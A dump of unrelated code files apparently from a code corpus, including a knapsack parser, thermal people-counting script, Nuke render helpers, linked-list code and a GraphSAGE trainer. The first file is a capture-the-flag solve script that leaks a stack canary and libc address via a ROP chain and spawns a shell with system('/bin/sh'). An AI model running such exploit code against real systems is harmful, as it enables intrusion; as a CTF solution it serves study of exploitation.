\", \"b\")\n sleep(0.01)\n payload = flat(cyclic(264), canary, base - 8)\n payload += flat(prdi, elf.got['read'], elf.plt['puts'])\n payload += flat(prdi, base, elf.plt['gets'])\n payload += flat(leaveret)\n io.sendline(payload)\n sleep(0.01)\n\n io.sendlineafter(\"> \", \"d\")\n io.sendlineafter(\"> \", \"n\")\n\nif __name__ == \"__main__\":\n# with context.quiet:\n # raw_input(\"DEBUG: \")\n static_key()\n canary = static_key()[-16: ].decode('hex')\n print(\"canary -> \" + canary.encode('hex'))\n\n # raw_input(\"DEBUG: \")\n rop(canary)\n libc.address = u64(io.recvuntil(\"\\x7f\")[-6: ] + '\\0\\0') - libc.sym['read']\n success(\"libc -> {:#x}\".format(libc.address))\n\n prdi = 0x0000000000401283\n payload = flat(prdi, next(libc.search(\"/bin/sh\")), libc.sym['system'])\n io.sendline(payload)\n\n io.interactive()\n","sub_path":"whctf2017_rc4/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"244702594","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom problem_container import ProblemContainer\n\nclass Parser(object):\n\n #def __init__(self, filename):\n\n @classmethod\n def parse_file(cls, filename):\n\n parsed_problems = []\n identificator = 1\n\n with open(filename, \"r+\") as file_handler:\n\n while True:\n\n # Primer linea: Nombre del archivo\n name = file_handler.readline()\n if not name:\n # Llegue al final del archivo\n return parsed_problems\n\n # Segunda linea: Cantidad de items\n cant_items = int(file_handler.readline().rstrip().split(' ')[1])\n values = [0 for x in range(cant_items)]\n weights = [0 for x in range(cant_items)]\n included = [0 for x in range(cant_items)]\n\n # Tercera linea: Capacidad de la mochila\n knapsack_weight = int(file_handler.readline().rstrip().split(' ')[1])\n\n # Cuarta linea: Solucion optima encontrada por el autor del ejemplo\n value_found = int(file_handler.readline().rstrip().split(' ')[1])\n\n # Quinta fila: Tiempo que tardo el autor del ejemplo en encontrar solucion\n time = file_handler.readline()\n\n # Desde aquí, cant_items lineas con la descripcion de cada item (Formato CSV)\n i = 0\n for line in file_handler:\n\n # El ejemplo termina con estos guiones\n if \"-----\" in line:\n break\n\n separated_line = line.split(',')\n # Primer campo: Numero de item\n\n # Segundo campo: Valor del item\n values[i] = int(separated_line[1])\n\n # Tercer campo: Peso del item \n weights[i] = int(separated_line[2])\n\n # Cuarto campo: Si pertenece a solucion optima\n included[i] = int(separated_line[3])\n i += 1\n\n parsed_problems.append(ProblemContainer(identificator, name, cant_items, knapsack_weight, value_found, time, values, weights, included))\n identificator += 1\n\n blank_line = file_handler.readline()\n if not blank_line:\n # Llegue al final del archivo\n return parsed_problems\n","sub_path":"tp2/programacion-dinamica/knapsack/knapsack_file_parser.py","file_name":"knapsack_file_parser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"364650711","text":"import board\nimport busio\nimport adafruit_mlx90640\nimport numpy as np\nimport cv2\nfrom math import sqrt\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Sources:\n# https://answers.opencv.org/question/210645/detection-of-people-from-above-with-thermal-camera/\n# https://www.learnopencv.com/blob-detection-using-opencv-python-c/\n# https://github.com/thequicketsystem/people-counting-visual/\n# https://stackoverflow.com/questions/35884409/how-to-extract-x-y-coordinates-from-opencv-cv2-keypoint-object\n\nIMG_WIDTH, IMG_HEIGHT = 32, 24\nTEMP_MIN, TEMP_MAX = 6, 20\n\nSCALE_FACTOR = 10\n\nSCALED_WIDTH, SCALED_HEIGHT = IMG_WIDTH * SCALE_FACTOR, IMG_HEIGHT * SCALE_FACTOR\n\nMIN_TEMP = 30\n\nSEP = (IMG_WIDTH * SCALE_FACTOR) // 2\n\nPOLLING_FRAMES_LENGTH = 4\nEXTENSION_LENGTH = 8\n\nCONFIDENCE_THRESHOLD = 0\n\ni2c = busio.I2C(board.SCL, board.SDA, frequency=800000)\nmlx = adafruit_mlx90640.MLX90640(i2c)\nmlx.refresh_rate = adafruit_mlx90640.RefreshRate.REFRESH_16_HZ\n\nf = [0] * (IMG_WIDTH * IMG_HEIGHT)\n\n## Blob detection parameters\nparams = cv2.SimpleBlobDetector_Params()\n\n# Change thresholds\nparams.minThreshold = 0;\nparams.maxThreshold = 255;\n\n# Filter by Area.\nparams.filterByArea = True\nparams.minArea = 700\nparams.maxArea = 7000\n\n# Filter by Circularity\nparams.filterByCircularity = True\nparams.minCircularity = 0.1\n\n# Filter by Inertia\nparams.filterByInertia = True\nparams.minInertiaRatio = 0.01\n\ndetectors = [cv2.SimpleBlobDetector_create(params) for i in range(2)]\n\n# TODO: Major cleanup/un-spaghettification needed if this does actually work\ndef get_frame_data() -> int:\n\n frames = POLLING_FRAMES_LENGTH\n is_ext = False\n\n top_data, bottom_data = 0, 0\n\n while frames > 0 and not (bottom_data > CONFIDENCE_THRESHOLD and top_data > CONFIDENCE_THRESHOLD): \n try:\n mlx.getFrame(f)\n except ValueError:\n pass\n \n temp_data = np.array(f).reshape((IMG_HEIGHT, IMG_WIDTH))\n\n temp_data = cv2.resize(temp_data, dsize=(SCALED_WIDTH, SCALED_HEIGHT))\n temp_data = cv2.normalize(temp_data, temp_data, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n # drop colder temp data\n temp_data[temp_data < 80] = 0\n\n # smoothes image and reduces noise while preserving edges\n temp_data = cv2.bilateralFilter(temp_data, 9, 150, 150)\n\n kernel = np.ones((5,5), np.uint8)\n\n temp_data = cv2.erode(temp_data, kernel, iterations = 1)\n temp_data = cv2.dilate(temp_data, kernel, iterations = 1)\n\n temp_data = cv2.morphologyEx(temp_data, cv2.MORPH_CLOSE, kernel)\n\n temp_data = cv2.bitwise_not(temp_data)\n\n temp_data_top, temp_data_bottom = temp_data[:,:SCALED_HEIGHT], temp_data[:,SCALED_HEIGHT:]\n \n keypoints = []\n\n # process the two halves in seperate threads\n # this will need to be cleaned up a lot later. no magic numbers!\n with ThreadPoolExecutor() as ex:\n td_future = ex.submit(detectors[0].detect, temp_data_top)\n bd_future = ex.submit(detectors[1].detect, temp_data_bottom)\n\n # join the results together\n keypoints.extend(td_future.result())\n keypoints.extend(bd_future.result())\n\n\n if len(keypoints) == 1 and not is_ext:\n frames += EXTENSION_LENGTH\n is_ext = True\n\n pts = cv2.KeyPoint_convert(keypoints)\n for point in pts:\n if point[1] < SEP:\n top_data += 1\n else:\n bottom_data += 1\n\n # Draw circles around blobs and display count on screen\n output_frame = cv2.drawKeypoints(temp_data, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n # Draw count of blobs inside circle and outside circle, as well as the circle itself\n cv2.putText(output_frame, f\"top: {top_data}\", (10, SCALED_HEIGHT - 40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n cv2.putText(output_frame, f\"bottom: {bottom_data}\", (10, SCALED_HEIGHT - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n cv2.line(output_frame, (0, SCALED_HEIGHT // 2), (SCALED_WIDTH, SCALED_HEIGHT // 2), (0, 255, 255), 2)\n\n cv2.imshow(\"People Counting Subsystem (Thermal) Demo\", output_frame)\n cv2.waitKey(1)\n\n frames -= 1\n\n return len([x for x in [top_data, bottom_data] if x > CONFIDENCE_THRESHOLD])\n\n\nwhile True:\n print(f\"Count:{get_frame_data()}\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"109769182","text":"# -*- coding: UTF-8 -*-\n'''\nAuthor: Jaime Rivera\nFile: nuke_specific_functions.py\nDate: 2019.09.29\nRevision: 2019.09.29\nCopyright: Copyright Jaime Rivera 2019 | www.jaimervq.com\n The program(s) herein may be used, modified and/or distributed in accordance with the terms and conditions\n stipulated in the Creative Commons license under which the program(s) have been registered. (CC BY-SA 4.0)\n\nBrief:\n\n'''\n\n__author__ = 'Jaime Rivera '\n__copyright__ = 'Copyright 2019, Jaime Rivera'\n__credits__ = []\n__license__ = 'Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)'\n__maintainer__ = 'Jaime Rivera'\n__email__ = 'jaime.rvq@gmail.com'\n__status__ = 'Testing'\n\nimport nuke\n\ndef get_the_scene():\n scene = nuke.root().knob('name').value()\n return scene\n\ndef customize_nodes(custom_dict, only_selected_writes):\n\n response = []\n response.append(['-- CUSTOMIZING NODES --', 'cyan'])\n\n if custom_dict['scanlines']:\n for target_scanline_node in custom_dict['scanlines'].keys():\n\n node = nuke.toNode(target_scanline_node)\n\n for attr in custom_dict['scanlines'][target_scanline_node]:\n attr_value = custom_dict['scanlines'][target_scanline_node][attr]\n node[attr].setValue(attr_value)\n response.append(['ScanlineRender {0}, Attribute {1} set to {2}'.format(target_scanline_node, attr, attr_value), 'lime'])\n else:\n response.append(['INFO: No ScanlineRender nodes in the list, skipping customization step', 'orange'])\n\n\n if custom_dict['rays']:\n for target_ray_node in custom_dict['rays'].keys():\n\n node = nuke.toNode(target_ray_node)\n\n for attr in custom_dict['rays'][target_ray_node]:\n attr_value = custom_dict['rays'][target_ray_node][attr]\n node[attr].setValue(attr_value)\n response.append(['RayRender {0}, Attribute {1} set to {2}'.format(target_ray_node, attr, attr_value), 'lime'])\n else:\n response.append(['INFO: No RayRender nodes in the list, skipping customization step', 'orange'])\n\n\n if custom_dict['writes']:\n for target_write_node in custom_dict['writes'].keys():\n\n node = nuke.toNode(target_write_node)\n\n selected = custom_dict['writes'][target_write_node]['selected']\n\n if (not selected) and (only_selected_writes):\n response.append(['Write node {0} was not selected, will not be customized/rendered'.format(target_write_node), 'orange'])\n else:\n file_value = custom_dict['writes'][target_write_node]['file']\n node['file'].setValue(file_value)\n response.append([\"Write node {0}, Attribute 'file' set to {1}\".format(target_write_node, file_value), 'lime'])\n else:\n response.append(['INFO: No Write nodes in the list, skipping customization step', 'orange'])\n\n\n return response\n\n\ndef write_custom(custom_dict, only_selected_writes):\n\n response = []\n response.append(['-- WRITING --', 'cyan'])\n\n if custom_dict['writes']:\n for target_write_node in custom_dict['writes'].keys():\n\n node = nuke.toNode(target_write_node)\n\n frame_start = 0\n frame_end = 1\n frame_range = custom_dict['writes'][target_write_node]['range']\n if '-' in frame_range:\n frame_start = frame_range.split('-')[0]\n frame_end = frame_range.split('-')[1]\n else:\n frame_start = frame_range\n frame_end = frame_range\n\n selected = custom_dict['writes'][target_write_node]['selected']\n\n if (not selected) and (only_selected_writes):\n response.append(['Write node {0} was not selected, will not be rendered'.format(target_write_node), 'orange'])\n else:\n response.append([\"STARTED Writing node {0}, for frame range {1}-{2}\".format(target_write_node, frame_start, frame_end), 'fuchsia'])\n nuke.execute(target_write_node, frame_start, frame_end)\n response.append([\"FINISHED Writing node {0}, for frame range {1}-{2}\".format(target_write_node, frame_start, frame_end), 'fuchsia'])\n\n else:\n response.append(['ERROR: No valid Write nodes to write', 'red'])\n\n return response\n\n\ndef return_to_normal(original_dict):\n\n response = []\n response.append(['-- RESETING NODES BACK TO ORIGINAL VALUES --', 'cyan'])\n\n for category in original_dict.keys():\n\n if original_dict[category]:\n for node in original_dict[category].keys():\n\n n = nuke.toNode(node)\n\n for attribute in original_dict[category][node].keys():\n\n attr_value = original_dict[category][node][attribute]\n n[attribute].setValue(attr_value)\n response.append([\"Restored node {0} attribute {1} back to {2}\".format(node,attribute, attr_value), 'lime'])\n else:\n if category == 'scanlines':\n response.append([\"INFO: No ScanlineRender nodes were previously customized, skipping step\", 'orange'])\n if category == 'rays':\n response.append([\"INFO: No RayRender nodes were previously customized, skipping step\", 'orange'])\n if category == 'writes':\n response.append([\"INFO: No Write nodes were previously customized, skipping step\", 'orange'])\n\n return response","sub_path":"nuke_specific_functions.py","file_name":"nuke_specific_functions.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"251574483","text":"import pyautogui\r\nimport time\r\n\r\nantall_klikk = 10\r\ndelay = 1\r\n\r\npyautogui.FAILSAFE = True\r\n\r\nk = 0\r\n\r\nwhile k < antall_klikk:\r\n pyautogui.click()\r\n print(\"Klikk nummer \", k)\r\n time.sleep(delay)\r\n\r\n k = k + 1\r\n\r\n","sub_path":"klikk-script.py","file_name":"klikk-script.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638392756","text":"#!/usr/bin/python2\n\nprint(\"content-type: text/html\")\nprint(\"\")\n\n#print(\"hello\")\n\nimport cgi\nimport commands as sp\n\nform=cgi.FormContent()\nprint(form)\n\nmaster=[]\nslave=[]\njob=[]\ntask=[]\nfor i in form.keys():\n\tif 'm' in i:\n\t\tmaster.append(i)\n\telif 'd' in i:\n\t\tslave.append(i)\t\n\telif 'j' in i:\n\t\tjob.append(i)\n\telif 't' in i:\n\t\ttask.append(i)\nsp.getoutput(\"sudo chown apache /ws_ansible\")\nfdir=open('/ws_ansible/dir_var.yml','w')\nd=sp.getoutput(\"date +%F%T\")\nfdir.write(\"master: m{} \\n\".format(d))\nfdir.write(\"slave: s{} \\n\".format(d))\nfdir.write(\"mip1: {} \\n\".format(form.get('mip1')[0]))\nfdir.write(\"jip: {} \\n\".format(form.get('jip')[0]))\nfdir.close()\n\n\n\nsp.getoutput(\"sudo chown apache /myhosts\")\nfhost=open('/myhosts/hosts','w')\n\nfhost.write(\"[master]\\n\")\nfor i in master:\n\tfhost.write(form[i][0] + '\\n')\nfhost.write(\"[slave]\\n\")\nfor i in slave:\n\tfhost.write(form[i][0]+'\\n')\nfhost.write(\"[job]\\n\")\nfor i in job:\n\tfhost.write(form[i][0]+'\\n')\n\nfhost.write(\"[task]\\n\")\nfor i in task:\n\tfhost.write(form[i][0]+'\\n')\n\nfhost.close()\n\nprint(\"\"\"\nWE RECIEVED YOUR DATA SUCCESFULLY\n
\nCLICK TO START:\n
\n
\nNAMENODE:\n\n
\n
\n
\nJOBTRACKER: \n
\n
\n\n
\nDATANODE: \n
\n
\n\n
\nTASKTRACKER:\n
\n\"\"\")\n","sub_path":"hadoop setup ansible/final_setup.py","file_name":"final_setup.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"514199362","text":"from funny_puzzle import *\r\nimport sys\r\nimport time\r\n\r\nif __name__ == '__main__':\r\n\r\n # set this to \"new\" for updated version\r\n # that demands requeuing\r\n # set this to \"original\"\r\n # for the crappy one\r\n ref_version = \"new\"\r\n\r\n # this is necessary to print to file\r\n backup_stdout = sys.stdout\r\n sys.stdout = open('test.txt', 'w')\r\n starttime = time.time()\r\n\r\n # these are a bunch of random test cases\r\n \r\n solve([6, 4, 7, 8, 5, 0, 3, 2, 1])\r\n solve([8, 2, 7, 3, 1, 6, 4, 0, 5])\r\n solve([6, 5, 7, 1, 8, 2, 3, 4, 0])\r\n solve([8, 6, 5, 7, 1, 4, 0, 2, 3])\r\n solve([6, 4, 8, 2, 3, 5, 1, 7, 0])\r\n solve([7, 8, 6, 5, 4, 0, 2, 3, 1])\r\n solve([6, 5, 7, 4, 0, 2, 3, 1, 8])\r\n solve([3, 6, 2, 5, 8, 0, 4, 7, 1])\r\n #solve([8, 6, 7, 2, 5, 4, 3, 0, 1])\r\n\r\n print_succ([6, 4, 7, 8, 5, 0, 3, 2, 1])\r\n print_succ([8, 2, 7, 3, 1, 6, 4, 0, 5])\r\n print_succ([6, 5, 7, 1, 8, 2, 3, 4, 0])\r\n print_succ([8, 6, 5, 7, 1, 4, 0, 2, 3])\r\n print_succ([6, 4, 8, 2, 3, 5, 1, 7, 0])\r\n print_succ([7, 8, 6, 5, 4, 0, 2, 3, 1])\r\n print_succ([6, 5, 7, 4, 0, 2, 3, 1, 8])\r\n print_succ([3, 6, 2, 5, 8, 0, 4, 7, 1])\r\n\r\n # These are unsolvable\r\n #solve([7, 2, 8, 5, 0, 4, 3, 6, 1])\r\n #solve([1, 2, 3, 4, 0, 6, 7, 8, 5])\r\n #solve([8, 7, 5, 6, 0, 4, 3, 2, 1])\r\n\r\n # these are examples from the writeup\r\n print_succ([1, 2, 3, 4, 5, 0, 6, 7, 8])\r\n solve([4, 3, 8, 5, 1, 6, 7, 2, 0])\r\n print_succ([8, 7, 6, 5, 4, 3, 2, 1, 0])\r\n solve([1, 2, 3, 4, 5, 6, 7, 8, 0])\r\n solve([1, 2, 3, 4, 5, 6, 7, 0, 8])\r\n\r\n endtime = time.time()\r\n\r\n sys.stdout.close()\r\n sys.stdout = backup_stdout\r\n live = open('test.txt', 'r')\r\n if ref_version == \"new\":\r\n ref = open('ref.txt', 'r')\r\n else:\r\n ref = open('badref.txt', 'r')\r\n\r\n live_l = live.readlines()\r\n ref_l = ref.readlines()\r\n\r\n live.close()\r\n ref.close()\r\n\r\n line_no = 0\r\n for l, r in zip(live_l, ref_l):\r\n line_no += 1\r\n if not l == r:\r\n print(\"Yours: \" + l.strip())\r\n print(\"Ref: \" + r.strip())\r\n print(\"Line number: \" + str(line_no))\r\n print(\"\\n\")\r\n if not live_l:\r\n print(\"Did you... print anything? Check test.txt\")\r\n elif len(live_l) < len(ref_l):\r\n print(\"Looks like you didn't print enough stuff\")\r\n elif len(live_l) > len(ref_l):\r\n print(\"Looks like you printed too much stuff\")\r\n print(\"If the time below is all you see, your code is good.\")\r\n\r\n print(\"Elapsed time was: \" + str((endtime - starttime)) + \"s\")\r\n print(\"Ref elapsed time: 0.62s\")","sub_path":"A9/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"559803263","text":"# example\ninstructor = {\n \"name\": \"Colt\",\n \"owns_dog\": True,\n \"num_courses\": 4,\n \"favorite_language\": \"Python\",\n \"is_hilarious\": False,\n 44: \"My favorite number!\"\n}\n\n# Another way\nanother_dictionary = dict(key = 'value')\nanother_dictionary # {'key': 'value'}\n\n# accessing Data\ninstructor['name'] # 'Colt\ninstructor['thing'] # KeyError\n\n# How to iterate dictionaries\nfor value in instructor.values():\n print(value)\n# \"Colt\"\n# True\n# 4\n# etc....\n\nfor v in instructor.keys():\n print(v)\n\n# name\n# owns_dog\n# num_courses\n# etc...\n\n# when you want to access both\n\nfor key,value in instructor.items():\n print(key,value)\n\n# name \"Colt\"\n# owns_dog True\n# num_courses 4\n# favorite_language \"Python\"\n# is_hilarious False\n# 44 \"My favorite number!\"\n\n# how to test if a key exists in a dictionary \n'name' in instructor # True\n'awesome' in instructor # False\n\n# test for values\n\"Colt\" in instructor.values() # True\n'Nope!' in instructor.values() # False","sub_path":"14_dictionaries/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524156621","text":"from Aggregator import Aggregator\nfrom GraphSAGE import GraphSAGE\nfrom collections import defaultdict, namedtuple\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport numpy as np\nimport time\nimport random\nfrom sklearn.metrics import f1_score\nfrom torch.autograd import Variable\n\n\n# SAGEInfo is a namedtuple that specifies the parameters \n# of the recursive GraphSAGE layers\nSAGEInfo = namedtuple(\"SAGEInfo\",\n ['layer_name', # name of the layer (to get feature embedding etc.)\n 'neigh_sampler', # callable neigh_sampler constructor\n 'num_samples',\n 'input_dim',\n 'output_dim' # the output (i.e., hidden) dimension\n ])\n\nclass SupervisedGraphSage(nn.Module):\n\n def __init__(self, num_classes, enc):\n super(SupervisedGraphSage, self).__init__()\n self.enc = enc\n self.xent = nn.CrossEntropyLoss()\n\n self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))\n nn.init.xavier_uniform_(self.weight)\n\n def forward(self, nodes):\n embeds = self.enc(nodes)\n scores = self.weight.mm(embeds.t())\n\n return scores.t()\n\n def loss(self, nodes, labels):\n scores = self.forward(nodes)\n return self.xent(scores, labels.squeeze())\n\ndef load_cora():\n num_nodes = 2708\n num_feats = 1433\n feat_data = np.zeros((num_nodes + 1, num_feats))\n labels = np.empty((num_nodes,1), dtype=np.int64)\n node_map = {}\n label_map = {}\n with open(\"GraphSAGE-master/cora/cora.content\") as fp:\n for i,line in enumerate(fp):\n info = line.strip().split()\n feat_data[i,:] = list(map(float, info[1:-1]))\n node_map[info[0]] = i\n if not info[-1] in label_map:\n label_map[info[-1]] = len(label_map)\n labels[i] = label_map[info[-1]]\n feat_data[-1,:]= [0 for i in range(num_feats)]\n\n adj_lists = defaultdict(set)\n with open(\"GraphSAGE-master/cora/cora.cites\") as fp:\n for i,line in enumerate(fp):\n info = line.strip().split()\n paper1 = node_map[info[0]]\n paper2 = node_map[info[1]]\n adj_lists[paper1].add(paper2)\n adj_lists[paper2].add(paper1)\n return feat_data, labels, adj_lists\n\ndef run():\n np.random.seed(1)\n random.seed(1)\n num_nodes = 2708\n feat_dim = 1433\n hidden_dim = 128\n feat_data, labels, adj_lists = load_cora()\n\n\n layer_infos = [SAGEInfo(\"node\", None, 10, feat_dim, hidden_dim),\n SAGEInfo(\"node\", None, 10, hidden_dim, hidden_dim)]\n sage = GraphSAGE(feat_data, num_nodes, layer_infos, 0, adj_lists)\n # sage = GraphSAGE(feat_data, num_nodes, feat_dim, layer_infos, adj_lists)\n graphsage = SupervisedGraphSage(7, sage)\n graphsage.cuda()\n rand_indices = np.random.permutation(num_nodes)\n test = rand_indices[:1000]\n val = rand_indices[1000:1500]\n train = list(rand_indices[1500:])\n\n optimizer = torch.optim.SGD(filter(lambda p : p.requires_grad, graphsage.parameters()), lr=0.7)\n times = []\n for batch in range(100):\n batch_nodes = train[:256]\n random.shuffle(train)\n start_time = time.time()\n optimizer.zero_grad()\n loss = graphsage.loss(batch_nodes, \n Variable(torch.LongTensor(labels[np.array(batch_nodes)])))\n loss.backward()\n optimizer.step()\n end_time = time.time()\n times.append(end_time-start_time)\n print(batch, loss.data)\n # print(batch, loss.data[0])\n\n val_output = graphsage.forward(val) \n print (\"Validation F1:\", f1_score(labels[val], val_output.data.numpy().argmax(axis=1), average=\"micro\"))\n print (\"Average batch time:\", np.mean(times))\n\nif __name__ == \"__main__\":\n run()","sub_path":"GCN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"552033682","text":"#This program implements linked list functions without an encapsulating linked list class\n\nclass Node:\n def __init__(self, data = None, next = None):\n self.data = data\n self.next = next\n\n#Adding to front of list\ndef add_to_front(data, head):\n return Node(data, head)\n\n#Printing all elemens of list\n# Iterative\n\ndef print_list(head):\n while head != None:\n print(head.data, end=\" \")\n head = head.next\n print(\"\")\n \n# Recursive\n\ndef print_lis_rec(head):\n if head != None:\n print(head.data, end=\" \")\n print_lis_rec(head.next)\n else:\n print(\"\")\n\n#Removing from front of list\ndef remove_from_front(head):\n if head == None:\n return None\n else:\n return head.next\n\n#Adding to back of list\ndef add_to_back(data, head):\n if head == None:\n return Node(data, None)\n \n head.next = add_to_back(data, head.next)\n return head\n\n#Removing from back\ndef remove_from_back(head):\n if head == None or head.next == None:\n return None\n \n head.next = remove_from_back(head.next)\n\n return head\n\n#Recursive operations for list\ndef get_list_length_iterative(head):\n size_count = 0\n\n while head != None:\n size_count += 1\n head = head.next\n \n return size_count\n\ndef get_lis_length_recursive(head):\n if head == None:\n return 0\n else:\n return 1 + get_lis_length_recursive(head.next)\n\ndef get_sum_of_lis(head):\n if head == None:\n return 0\n elif head.next == None:\n return head.data\n else:\n return head.data + get_sum_of_lis(head.next)\n\n#Insert an element in its rightful place in a sorted list\n\ndef insert_ordered_iterative(head, data):\n if head == None or head.data >= data:\n return Node(data, head)\n \n curr_node = head\n\n while curr_node != None and curr_node.next.data < data:\n curr_node = curr_node.next\n \n curr_node.next = Node(data, curr_node.next)\n\n return head\n\ndef insert_ordered_recursive(head, data):\n if head == None or head.data > data:\n return Node(data, head)\n\n head.next = insert_ordered_recursive(head.next, data)\n return head\n\n#Reverse a given list\n\ndef reverse_lis(head):\n if head == None or head.next == None:\n return head\n curr_node = reverse_lis(head.next)\n head.next.next = head\n head.next = None\n return curr_node\n\n#Merge two lists\n\ndef merge_lis(head1, head2):\n if head1 == None:\n return head2\n elif head2 == None:\n return head1\n elif head1.data < head2.data:\n head1.next = merge_lis(head1.next, head2)\n return head1\n else:\n head2.next = merge_lis(head1, head2.next)\n return head2\n \n#Merge sort a list\n\ndef merge_sort(head):\n if head == None or head.next == None:\n return head\n\n node_half = head\n node = head.next\n\n while node != None and node.next != None:\n node_half = node_half.next\n node = node.next.next\n \n node = node_half.next\n node_half.next = None\n\n return merge_lis(merge_sort(head), merge_sort(node))\n\n#Implementation of stack and queue with Node class\nclass Stack:\n def __init__(self):\n self.top = None\n self.size = 0\n \n def push(self, data):\n self.top = Node(data, self.top)\n self.size += 1\n \n def pop(self):\n if self.top == None:\n return None\n \n ret_val = self.top.data\n self.top = self.top.next\n self.size -= 1\n\n return ret_val\n \n def get_size(self):\n return self.size\n \n def __str__(self):\n ret_str = \"\"\n\n curr_node = self.top\n\n while curr_node != None:\n ret_str += str(curr_node.data) + \" \"\n curr_node = curr_node.next\n \n return ret_str\n\nclass Queue:\n def __init__(self):\n self.head = None\n self.tail = None\n self.size = 0\n \n def push_back(self, data):\n if self.head == None:\n self.head = self.tail = Node(data, None)\n else:\n self.tail.next = Node(data, None)\n self.tail = self.tail.next\n \n self.size += 1\n \n def pop_front(self):\n if self.head == None:\n return None\n else:\n ret_val = self.head.data\n self.head = self.head.next\n\n if self.head == None:\n self.tail = self.head\n\n self.size -= 1\n return ret_val\n \n def get_size(self):\n return self.size\n \n def __str__(self):\n ret_str = \"\"\n curr_node = self.head\n\n while curr_node != None:\n ret_str += str(curr_node.data) + \" \"\n curr_node = curr_node.next\n \n return ret_str\n \nif __name__ == \"__main__\":\n head = Node(1, Node(2, Node(3, Node(4, Node(5, None)))))\n\n print_list(head)\n\n print_list(add_to_front(7, head))\n\n print_list(head)\n\n print_lis_rec(head)\n\n print_lis_rec(remove_from_front(head))\n\n print_lis_rec(add_to_back(6, head))\n\n print_lis_rec(remove_from_back(head))\n\n print(get_list_length_iterative(head))\n print(get_lis_length_recursive(head))\n\n print(get_sum_of_lis(head))\n\n insert_ordered_recursive(head, 8)\n\n print_lis_rec(head)\n\n print_lis_rec(reverse_lis(head))\n\n head2 = Node(5, Node(7, Node(23, Node(25, None))))\n\n merge_lis(head, head2)\n\n print_lis_rec(merge_sort(head))\n\n stack = Stack()\n\n for i in range(10):\n stack.push(i)\n \n print(stack)\n\n stack.pop()\n\n print(stack)\n\n print(stack.get_size())\n\n queue = Queue()\n\n for i in range(10):\n queue.push_back(i)\n \n print(queue)\n\n queue.pop_front()\n\n print(queue)\n\n print(queue.get_size())\n\n\n\n","sub_path":"nodes_and_linkedlis_no_encap.py","file_name":"nodes_and_linkedlis_no_encap.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"61168219","text":"A,B,K=map(int,input().split())\nflag=True\nfor i in range(K):\n if flag:\n flag=False\n A=A//2\n B+=A\n else:\n flag=True\n B=B//2\n A+=B\nprint(A,B)","sub_path":"Python_codes/p03228/s957976261.py","file_name":"s957976261.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"364915338","text":"class Solution:\n def smallestSubsequence(self, text: str) -> str:\n lastSeen = {}\n \n for i, ch in enumerate(text):\n lastSeen[ch] = i\n \n stack = []\n \n for i, ch in enumerate(text):\n if ch in stack:\n continue\n# While stack is not empty and stack top is a higher character and will occur later in the string\n while stack and stack[-1] > ch and lastSeen[stack[-1]] > i:\n stack.pop()\n stack.append(ch)\n \n return ''.join(stack)","sub_path":"leetcode/Problems/1081--Smallest-Subsequence-of-Distinct-Characters-Medium.py","file_name":"1081--Smallest-Subsequence-of-Distinct-Characters-Medium.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524432074","text":"from typing import Callable, List, Tuple, Dict\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nimport numpy as np\nimport pandas as pd\nfrom .utils import odd_even_split\n\n\ndef balanced_random_holdout(test_size: float, random_state: int, hyper_parameters: Dict) -> [Callable, str, Tuple[float, int]]:\n \"\"\"Return a function to create an holdout with given test_size and random_state and the path where to store it.\n test_size:float, float from 0 to 1, representing how many datapoints should be reserved to the test set.\n random_state:int, random state to reproduce experiment.\n hyper_parameters:Dict, additional hyper-parameters used to create the holdout.\n \"\"\"\n def holdout(dataset: Tuple):\n \"\"\"\n dataset, the dataset to split. It must finish with an array containing the classes.\n \"\"\"\n results = []\n for row in np.array([\n train_test_split(\n *[\n d[dataset[-1] == label]\n for d in dataset\n ],\n test_size=test_size,\n random_state=random_state\n )\n for label in np.unique(dataset[-1])\n ]).T:\n if all([\n isinstance(d, pd.DataFrame)\n for d in row\n ]):\n results.append(pd.concat(row))\n else:\n results.append(np.concatenate(row))\n\n train, test = odd_even_split(results)\n train = shuffle(*train, random_state=random_state)\n test = shuffle(*test, random_state=random_state)\n return sum(\n ((e1, e2) for e1, e2 in zip(train, test)), tuple()\n 